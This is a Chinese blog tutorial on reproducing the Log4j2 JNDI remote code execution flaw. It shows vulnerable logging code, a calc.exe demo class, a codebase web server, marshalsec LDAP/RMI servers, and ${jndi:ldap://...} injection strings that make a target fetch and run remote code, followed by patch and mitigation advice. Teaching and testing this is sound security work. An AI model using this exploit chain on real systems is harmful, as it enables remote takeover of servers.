Apache Log4j2 - JNDI RCE漏洞攻击保姆级教程(仅供测试请勿攻击他人)

最新推荐文章于 2022-10-05 14:14:15 发布
最新推荐文章于 2022-10-05 14:14:15 发布
阅读量9k 收藏 7
点赞数 5
分类专栏: 网络安全与渗透测试 文章标签: 安全 Log4j2 JNDI RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ory001/article/details/121879748
版权

Apache Log4j2 - JNDI RCE漏洞攻击保姆级教程(仅供测试请勿攻击他人)

文章目录

一、前言

近日,Java日志组件Log4j2爆出严重0 day漏洞,吓得我赶紧研究了一下,不看不知道,这玩意的严重程度极高,达到10分,且易于利用。

JNDI(Java Naming and Directory Interface)是一个应用程序设计的API,为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口,类似JDBC都是构建在抽象层上。现在JNDI已经成为J2EE的标准之一,所有的J2EE容器都必须提供一个JNDI的服务。
JNDI可访问的现有的目录及服务有:
DNS、XNam 、Novell目录服务、LDAP(Lightweight Directory Access Protocol轻型目录访问协议)、 CORBA对象服务、文件系统、Windows XP/2000/NT/Me/9x的注册表、RMI、DSML v1&v2、NIS。

RCE漏洞(Remote Command/Code Execute)指远程代码执行漏洞。

二、被攻击端

@Component
public class CorsFilter implements Filter {

    public static final Logger LOGGER = LoggerFactory.getLogger(CorsFilter.class);
    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) servletRequest;
        HttpServletResponse rep = (HttpServletResponse) servletResponse;
        final String authorization = req.getHeader("Authorization");
        // Logger 使用log4j2 2.14
        LOGGER.info(authorization);
        if (CorsUtils.isCorsRequest(req)) {
        	// 省略无关代码
        }

        filterChain.doFilter(servletRequest, servletResponse);
    }
}

三、攻击端

1.JNDI RCE漏洞嗅探

  • 原理

将dnslog平台中的特有字段payload带入目标发起dns请求,通过dns解析将请求后的关键信息组合成新的三级域名带出,在ns服务器的dns日志中显示出来。

dnslog Platform

  • 探测漏洞
    postman
    dnslog

通过postman测试,发现log4j2 2.14确实存在JDNI漏洞。

2.编写恶意代码并编译

注意:与“被攻击端”保持一致的jdk版本,避免“被攻击端”不支持加载恶意class。

mkdir -p /opt/jndi/attack-code
cat > Calc.java <<\EOF
import java.io.*;
 
public class Calc {
    static {
        try {
        	// 打开“被攻击端”的计算器程序
            Runtime.getRuntime().exec("calc.exe");
        }
        catch (IOException ex) {
            ex.printStackTrace();
        }
    }
}
EOF
javac Calc.java

3.搭建codebase web服务

cd /opt/jndi/attack-code
nohup python -m SimpleHTTPServer 1111 > nohup.out 2>&1 &
netstat -lntp
curl http://localhost:1111/

4.搭建RMI或LDAP服务监听

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
  • 用法
java -cp target/marshalsec-[VERSION]-SNAPSHOT-all.jar marshalsec.jndi.(LDAP|RMI)RefServer <codebase>#<class> [<port>]
  • 使用RMI协议

对应的注入字符串为${jndi:rmi://192.168.198.138:9999/Calc};注意要求jdk版本小于8u121,比如我本地搭建的被攻击端测试服务使用jdk为8u151,使用RMI攻击失败,必须要求被攻击端再程序中增加System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");才可成功注入恶意代码。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.198.138:1111/#Calc" 9999
  • 使用LDAP协议

对应的注入字符串为${jndi:ldap://192.168.198.138:9999/Calc}

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.198.138:1111/#Calc" 9999
  • 通过postman注入jndi地址 ${jndi:rmi://192.168.198.138:9999/Calc}${jndi:ldap://192.168.198.138:9999/Calc}(根据攻击端的协议类型而定),此时发现被攻击端服务器弹出计算器程序。
    rmi

四、漏洞解决方案

1.升级jdk版本(>8u191)

  • JDK 6u45、7u21之后:java.rmi.server.useCodebaseOnly的默认值被设置为true。当该值为true时,将禁用自动加载远程类文件,仅从CLASSPATH和当前JVM的java.rmi.server.codebase指定路径加载类文件。使用这个属性来防止客户端VM从其他Codebase地址上动态加载类,增加了RMI ClassLoader的安全性。

  • JDK 6u141、7u131、8u121之后:增加了com.sun.jndi.rmi.object.trustURLCodebase选项,默认为false,禁止RMI和CORBA协议使用远程codebase的选项,因此RMI和CORBA在以上的JDK版本上已经无法触发该漏洞,但依然可以通过指定URI为LDAP协议来进行JNDI注入攻击。

  • JDK 6u211、7u201、8u191之后:增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给禁了。

2.升级log4j2版本(>=2.15.0)

升级log4j2版本到2.15.0,springboot可通过在pom.xml中增加如下配置升级log4j2版本。

<properties>
    <log4j2.version>2.15.0</log4j2.version>
</properties>

3.临时解决方案

  • JVM

JVM启动参数增加-Dlog4j2.formatMsgNoLookups=true或在项目的类路径(classpath)下增加log4j2.component.properties配置文件并增加配置项log4j2.formatMsgNoLookups=true

  • 网络

禁止被攻击端连接互联网

参考:
dnslog小技巧
5-java安全基础——RMI和JNDI实现漏洞利用
Fastjson反序列化与JNDI注入
【入坑JAVA安全】老公,JNDI注入是什么呀?

搬山境KL攻城狮
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
rogue-jndi:用于JNDI注入攻击的恶意LDAP服务器
05-04
流氓JNDI 用于JNDI注入攻击的恶意LDAP服务器。 描述 该项目包含LDAP和HTTP服务器,用于利用默认情况下不安全的Java JNDI API。 为了执行攻击,您可以在本地启动这些服务器,然后在易受攻击的客户端上触发JNDI解析,例如: InitialContext . doLookup( " ldap://your_server.com:1389/o=reference " ); 它将启动从易受攻击的客户端到本地LDAP服务器的连接。 然后,本地服务器使用包含有效载荷之一的恶意条目进行响应,这对于实现远程代码执行很有用。 动机 除了已知的JNDI攻击方法(通过引用中的远程类加载)之外,此工具还利用的功能带来了新的攻击媒介。 支持的有效载荷 经典的JNDI攻击,通过远程类加载导致RCE,可达到jdk8u191 通过org.apache.naming.factory.Bea
跟个风,聊一聊这两天很火的Log4j核弹漏洞
jinggege_795的博客
12-12 1468
相信大家这两天应该被这么一条新闻刷屏了吧: 这个漏洞到底是怎么回事? 核弹,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。 这篇文章,我尝试让所有技术相关的朋友都能看懂:这个注定会载入网络安全史册上的漏洞,到底是怎么一回事! log4j2 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。 通过日志,可以帮
jndi-JNDI-Injection-Exploit
12-27
java asm jndi_JNDI-Injection-Exploit,用于log4j2漏洞验证 可执行程序为jar包,在命令行中运行以下命令: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。 (可选项 , 默认命令是mac下打开计算器,即"open /Applications/Calculator.app") -A - 服务器地址,可以是IP地址或者域名。 (可选项 , 默认地址是第一个网卡地址) 注意: 要确保 1099、1389、8180端口可用,不被其他程序占用。 或者你也可以在run.ServerStart类26~28行更改默认端口。 命令会被作为参数传入Runtime.getRuntime().exec(), 所以需要确保命令传入exec()方法可执行。
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
log4j-2.15.0-rc2.zip
12-11
修复log4j关于JNDI注入漏洞注入的jar升包,内附漏洞验证方式
Log4j2 Jndi 漏洞原理解析、复盘
君一席
12-13 1721
“ 2021-12-10一个值得所有研发纪念的日子。” 一波操作猛如虎,下班到了凌晨2点25。 基础组件的重要性,在此次的Log4j2漏洞上反应的淋漓尽致,各种“核弹漏洞”、“超高危” 等词汇看的我瑟瑟发抖,那么问题真的有那么严重吗?这个让大家普遍加班搞到凌晨的漏洞,到底是什么问题? 01 — 漏洞解析、复现 Log4j2的框架设计非常优秀,各种功能均是以内部插件的方式进行的扩展实现,比如我们经常在Xml中定义的,实际对应的则是如下的AppendersPlugin对象 而我们在Xml Appenders
Apache Log4j2.x RCE命令执行漏洞攻击原理及修复措施
wangpf2011的博客
12-23 3833
截止2021.12.20,短短几天Log4j2.x已经连发3个版本,用以修复RCE命令执行漏洞Log4j2漏洞总体来说是通过JNDI注入恶意代码来完成攻击,具体的操作方式有RMI和LDAP等。 一、攻击原理 以RMI为例,简单阐述下该漏洞攻击原理: 1、攻击者首先发布一个RMI服务,此服务将绑定一个引用类型的RMI对象。在引用对象中指定一个远程的含有恶意代码的类。 2、攻击者再发布另一个恶意代码下载服务,此服务可以下载所有含有恶意代码的类。 3、攻击者利用Log4j2漏洞注入RMI调用,
Apache Log4j2 RCE 命令执行漏洞预警及修复方案
HBohan的博客
12-12 1557
漏洞名称:Apache Log4j2远程代码执行漏洞 组件名称:Apache Log4j2 截止2021年12⽉10⽇,受影响的Apache log4j2版本: 2.0≤Apache Log4j<=2.15.0-rc1 漏洞类型:远程代码执行
log4j jndi 漏洞解决办法
fuyun996的专栏
12-16 4119
log4j jndi 漏洞解决办法
CVE-2021-44228:Apache Log4j RCE
Fly_鹏程万里
12-18 1372
文章前言 本篇文章我们主要介绍关于CVE-2021-44228:Apache Log4j RCE漏洞的自检与修复,帮助甲方人员尽快修复项目中存在的不安全依赖 漏洞概述 Apache Log4j2是⼀个基于Java的⽇志记录⼯具,该⼯具重写了Log4j框架,并且引⼊了⼤量丰富的特性,该⽇志框架被⼤量⽤于业务系统开发,⽤来记录⽇志信息,⼤多数情况下,开发者可能会将⽤户输⼊导致的错误信息写⼊⽇志中,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执⾏漏洞。该漏洞
Linux sentinel启动
tonysh_zds的博客
12-01 1069
下载地址:https://github.com/alibaba/Sentinel/releases nohup java -Dserver.port=8849 -Dcsp.sentinel.dashboard.server=localhost:8849 -Dproject.name=sentinel-dashboard-1.7.0 -jar sentinel-dashboard-1.7.0.jar > log.txt 2>&1 &
Nacos入门
qq122516902的博客
04-24 2086
1 Nacos 1 nacos-sever 1.1 下载安装 https://github.com/alibaba/nacos/releases 1.2 部署 解压后启动: sh bin/startup.sh -m standalone -m standalone表示单机启动。 部署后访问localhost:8848/nacos可访问nacos控制台,然后以nacos/nacos(用户名/密码)登录。 停止nacos-server使用如下命令: sh bin/shutdown.sh 1.3 数据持久化
牛客网「土」秘法地震Cindy8849题解--容斥+前缀和
Cindy8849的博客
02-18 135
牛客网「土」秘法地震 题解–容斥+前缀和 题目 链接:https://ac.nowcoder.com/acm/problem/53676 来源:牛客网 「土」秘法地震 时间限制:C/C++ 1秒,其他语言2秒 空间限制:C/C++ 262144K,其他语言524288K 64bit IO Format: %lld 题目描述 帕秋莉掌握了一种土属性魔法 这种魔法可以在一片k×k大小的一个正方形区域内产生地震 但是如果某片即将产生地震的区域内有建筑物,帕秋莉会停止施法 整个地图大小为n×m,其中一些地方有建筑
学会Nacos应用这一篇就够了
yiqiu1959的博客
05-19 200
下载地址: https://github.com/alibaba/nacos/releases/tag/2.1.0 什么是Nacos Nacos 由Alibaba开发,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 作为这样的一个平台,核心就是两一个功能,配置管理和服务注册与发现。 现在一般的Spring Cloud生态可以由 服务网关GateWay 、服务注册Nacos、服务配置Nacos、服务调用、OpenFeign、服务降Hystrix几个部分注册 启动服务 Nacos默认集群模式
Nacos Exception: failed to req API:/nacos/v1/ns/instance after all servers([localhost:8848]
weixin_47316183的博客
05-12 1万+
问题描述:在添加项目到nacos中的时候,可以正常启动,但是报这个错: NacosException: failed to req API:/nacos/v1/ns/instance after all servers([localhost:8848] 去网上查询资料,网上有些是这样解决的, 1、没有引入nacos依赖 <dependency> <groupId>org.springframework.cloud</groupId> <artifac
Apache Log4j2 远程代码执行 (RCE) 漏洞 ES-6.3.2 修复记录
qq_31285735的博客
12-18 2207
官方给出的修复建议: Elasticsearch 5.0.0-5.6.10 and 6.0.0-6.3.2: Log4j CVE-2021-44228, CVE-2021-45046 remediation - Security Announcements - Discuss the Elastic Stack 1、先安装zip 工具 yum -y install zip 2、进入es安装目录。 cd /usr/share/elasticsearch 3、搜索log4j的jar包。 ...
漏洞预警:Apache Log4j RCE漏洞
热门推荐
weixin_43526443的博客
12-13 7万+
目录 Part1 漏洞描述 Part2 危害等 Part3 漏洞影响 Part4 漏洞分析及验证 源码分析 Part5 漏洞检测 自我检测 攻击检测 产品检测 Part6 漏洞修复 Part1 漏洞描述 Apache Log4jApache的一个开源项目,Apache log4j2Log4j的升版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的别,能够更加细致地控制日志的生成过程。 近日发现Apache Log4j存在任意代码执行
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 768
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞
apache log4j CVE-2021-44228漏洞怎么解决
最新发布
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升到该版本。 2.使用安全策略文件 在升之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

搬山境KL攻城狮

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值